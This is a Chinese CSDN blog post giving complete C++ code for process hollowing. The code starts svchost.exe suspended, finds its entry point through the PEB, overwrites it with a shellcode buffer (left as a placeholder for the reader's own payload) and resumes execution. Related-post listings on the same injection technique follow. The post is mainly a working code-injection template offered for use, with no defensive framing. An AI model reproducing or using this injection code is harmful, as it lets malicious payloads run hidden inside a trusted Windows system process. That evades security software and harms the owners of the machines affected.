创建傀儡进程代码

最新推荐文章于 2024-06-21 07:00:00 发布
最新推荐文章于 2024-06-21 07:00:00 发布
阅读量2k 收藏 7
点赞数 3
分类专栏: 心情杂货铺 文章标签: ProcessHollow 进程注入 傀儡进程
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cssxn/article/details/97645162
版权

相比传统的创建傀儡进程的方法,更简单粗暴一些,不用卸载目标进程空间内存。直接利用现有内存进行覆盖写入即可。
减少了一些步骤。

具体步骤:

1.挂起模式创建svchost.exe
2.获取进程入口点
3.将shellcode写到入口点
4.恢复线程执行

#include "stdafx.h"
#include <windows.h>
#include <Winternl.h>
#include "common.h"
#include <iostream>
using namespace std;

unsigned char buf[] = " 替换成你的shellcode";


int _tmain(int argc, _TCHAR* argv[])
{

    STARTUPINFOA si;
    PROCESS_INFORMATION pi;
    ZeroMemory(&si, sizeof(si));
    ZeroMemory(&pi, sizeof(pi));
    si.cb = sizeof(STARTUPINFOA);
    // 创建挂起进程
    if (!CreateProcessA(
        "c:\\windows\\sysWoW64\\svchost.exe",
        NULL,
        NULL,
        NULL,
        FALSE,
        CREATE_SUSPENDED,
        NULL,
        NULL,
        &si,
        &pi
        ))
    {
        printf("CreateProcess failed (%d).\n", GetLastError());
        return 0;
    }

    // 获取线程上下文
    CONTEXT ctx = { 0 };
    ctx.ContextFlags = CONTEXT_ALL;
    if (!GetThreadContext(pi.hThread, &ctx))
    {
        printf("GetThreadContext failed (%d).\n", GetLastError());
    }

    // 拿到目标进程主线程上下文后,在Ebx寄存器中保存的就是PEB的地址,
    // 而PEB结构偏移0x8的位置是AddressOfImageBase字段,
    // 所以直接来读取ctx.Ebx+0x8,就可以获取到目标进程的加载基址
    DWORD dwImageBase = 0;
    DWORD lpNumberOfBytesRead = 0;
    if (!ReadProcessMemory(pi.hProcess, (LPCVOID)(ctx.Ebx + 0x8), &dwImageBase, sizeof(DWORD), &lpNumberOfBytesRead))
    {
        printf("ReadProcessMemory failed (%d).\n", GetLastError());
        return 0;
    }


    // 在申请的空间中写入shellcode
    DWORD NumberOfBytesWritten = 0;
    if (!WriteProcessMemory(pi.hProcess, (LPVOID)ctx.Eax, buf, sizeof(buf), &NumberOfBytesWritten))
    {
        printf("WriteProcessMemory failed (%d).\n", GetLastError());
    }


    // 恢复线程执行
    if (ResumeThread(pi.hThread) == -1)
    {
        printf("ResumeThread failed (%d).\n", GetLastError());
    }

	return 0;
}

在这里插入图片描述

FFE4
关注
  • 3
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
傀儡进程注入
qq_40710190的博客
05-08 959
傀儡进程注入 这个注入之所以叫傀儡进程注入是因为其做法是先创建一个A进程,然后将其内存替换成要执行的代码,而从外部来看就是最初创建的A进程。 从我的视角来看跟PE文件注入还蛮像的,不同点在于PE文件注入是将代码注入进去后修改EntryPoint引导至注入代码,而傀儡进程注入则更加简单暴力一些😋,把所有内存替换了。 多亏了之前的一些PE基础因此没有特别费劲PE文件头格式解析 本章详细讲解m0n0ph1的源码 创建傀儡进程 根据一开始所说,我们需要创建一个进程 printf("Creating process
Windows傀儡进程实现C++代码
04-28
Windows平台傀儡进程实现,采用C++, vs2008实现,完美实现
傀儡进程详解
最新发布
N阶二进制的博客
06-21 516
傀儡进程是一种高级的隐蔽技术,攻击者利用进程注入进程替换和隐藏技术,伪装成合法进程进行恶意活动。理解这些技术及其防范措施对于保护系统安全至关重要。希望通过此详解和示例,大家能更好地理解傀儡进程的工作原理和防范方法。
进程注入创建傀儡进程
yeanhoo的博客
10-19 1750
傀儡进程创建一个进程,然后将其虚拟地址里的内容掏空,注入想要注入进程,以达到掩人耳目的效果 步骤: 1.以挂起的方式创建一个进程 2.卸载该进程的内存映射,即掏空该进程虚拟内存空间中的内容 3.获取该进程的CONTEXT上下文结构 4.将要注入的程序读入到内存中 5.在傀儡进程中申请足够的内存空间 6.手动将要注入的程序写入傀儡进程中所申请的内存空间 6.设置CONTEXT上下文的Eax为程序...
直接将自身代码注入傀儡进程
sevenpic的专栏
09-13 7643
<br />EXE注入-傀儡进程2008-08-16 16:38<br />      直接将自身代码注入傀儡进程,不需要DLL。首先用CreateProcess创建一个挂起的IE进程创建时候就把它挂起。然后得到它的装载基址,使用函数ZwUnmapViewOfSection来卸载这个这个基址内存空间的数据,。再用VirtualAllocEx来个ie进程重新分配内存空间,大小为要注入程序的大小(就是自身的imagesize)。使用WriteProcessMemory重新写IE进程的基址,就是刚才分配的内存
傀儡进程
苞米地里捉小鸡的博客
10-13 630
背景 傀儡进程本质上是借用正常的软件进程或是系统进程的外壳来执行非正常的恶意操作。 函数介绍 1.GetThreadContext 获取指定线程的上下文 2.SetThreadContext 设置指定线程的上下文 3.ResumeThread 减少线程的暂停计数。当暂停计数递减到零时,恢复线程的执行 实现原理 (1)第一步 利用CreateProcess创建进程并且使用CREATE_SUSPENDED标志挂起主线程 bRet = ::CreateProcess(pszFilePat
隐藏真实路径和进程名 你懂得
01-12
它能够帮助用户创建一个傀儡文件,这个傀儡文件在运行时会隐藏实际可执行文件的真实路径和进程名,从而增加了程序的隐蔽性。 首先,让我们了解一下什么是进程路径和进程名。在操作系统中,每个运行的程序都对应一个...
确实可行的EXE注入
11-23
黑客通过创建或控制傀儡进程,使恶意代码得以执行,同时隐藏其真实身份,避免被安全软件检测到。 具体实现EXE注入通常包括以下几个步骤: 1. **选择目标进程**:黑客首先会选择一个系统上正在运行的进程作为目标,...
内存加载exe的两种方式(支持win7)
11-24
然后,通过`VirtualAllocEx`在目标进程中分配内存,将DLL的路径写入该内存区域,最后创建远程线程执行`LoadLibraryA`或`LoadLibraryW`,使目标进程加载并执行你的DLL。 2. **远程进程创建Process Creation)与...
Linux2.6内核标准教程(共计8-- 第1个)
04-29
4.4.1 进程创建的接口函数 156 4.4.2 进程创建的处理过程 162 4.5 进程调度算法 177 4.5.1 进程的分类 178 4.5.2 进程优先级 178 4.5.3 时间片分配 181 4.5.4 进程调度时机 182 4.6 进程切换过程分析...
易语言-可被Svchost.exe启动的DLL服务源码 支持32/64位全系统
06-25
大家都知道,windows系统下有多个svchost.exe进程,它是从动态链接库 (DLL) 中运行的服务的通用主机进程名称。 本源码是一个完整的可被svchost.exe启动的DLL服务源码,同时包含了穿透Session0隔离来与桌面交互的源码(在Vista以上,如果你想在服务程序中创建窗体,目前是不可能直接显示到你的桌面的,而且在服务中是无法访问桌面任何窗口句柄的,因为服务和你使用的桌面不是同一个桌面,而是隔离开的)。 如上图所示,此源码用黑月编译的dll文件,在xp、server2003、win7x64、win10x64(管理员权限运行)测试通过,XP以上的系统应该全支持。但并不一定要黑月编译,静态编译也可以的。这个可以用来做什么?毕竟是系统服务,在开机的时候就运行了,不必登录到系统,具体能做什么大家发挥想象力...
Linux2.6内核标准教程(共计8--第2个)
04-29
4.4.1 进程创建的接口函数 156 4.4.2 进程创建的处理过程 162 4.5 进程调度算法 177 4.5.1 进程的分类 178 4.5.2 进程优先级 178 4.5.3 时间片分配 181 4.5.4 进程调度时机 182 4.6 进程切换过程分析...
Linux2.6内核标准教程(共计8--第3个)
04-29
4.4.1 进程创建的接口函数 156 4.4.2 进程创建的处理过程 162 4.5 进程调度算法 177 4.5.1 进程的分类 178 4.5.2 进程优先级 178 4.5.3 时间片分配 181 4.5.4 进程调度时机 182 4.6 进程切换过程分析...
Linux2.6内核标准教程(共计8--第5个)
04-29
4.4.1 进程创建的接口函数 156 4.4.2 进程创建的处理过程 162 4.5 进程调度算法 177 4.5.1 进程的分类 178 4.5.2 进程优先级 178 4.5.3 时间片分配 181 4.5.4 进程调度时机 182 4.6 进程切换过程分析...
Linux2.6内核标准教程(共计8--第6个)
04-29
4.4.1 进程创建的接口函数 156 4.4.2 进程创建的处理过程 162 4.5 进程调度算法 177 4.5.1 进程的分类 178 4.5.2 进程优先级 178 4.5.3 时间片分配 181 4.5.4 进程调度时机 182 4.6 进程切换过程分析...
代码注入傀儡进程
sevenpic的专栏
09-13 1978
 傀儡进程——Exe注入2009-09-17 16:29#include "stdafx.h"#include typedef long NTSTATUS;typedef NTSTATUS (__stdcall *pfnZwUnmapViewOfSection)(        IN HANDLE ProcessHandle,        IN LPVOID BaseAddress        );BOOL CreateIEProcess();PROCESS_INFORMATION pi  = {0};
傀儡进程 插入
tony的专栏
10-25 1273
BOOL InjectProcess(LPTSTR VictimFile,LPTSTR InjectExe) { HANDLE hFile; DWORD dwFileSize; //文件大小 IMAGE_DOS_HEADER DosHeader; IMAGE_NT_HEADERS NtHeader; PROCESS_INFORMATION pi; STARTUPINFO si;
dll注入系列——傀儡进程
40KO的博客
04-11 999
0x0介绍 之前说过,要动态注入dll文件,则需要执行程序中本身没有的加载操作,必须改变控制流,除了创建线程外,还可以劫持控制流。这与二进制漏洞利用比较类似,我们向程序写入一段shellcode,然后改变线程上下文,让其去执行shellcode,这段shellcode完成LoadLibrary的操作,就完成了dll注入傀儡进程的本质是利用其他进程空间来执行我们的写入代码,它的实现并不困难...
傀儡sql注入批量扫描工具
11-03
工具会自动发送有特殊注入代码的请求,以尝试从数据库中获取未经授权的数据。如果网站存在注入漏洞,工具将会提供相应的警报或报告。 使用傀儡SQL注入批量扫描工具的好处是可以快速发现并修复潜在的漏洞。通过...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值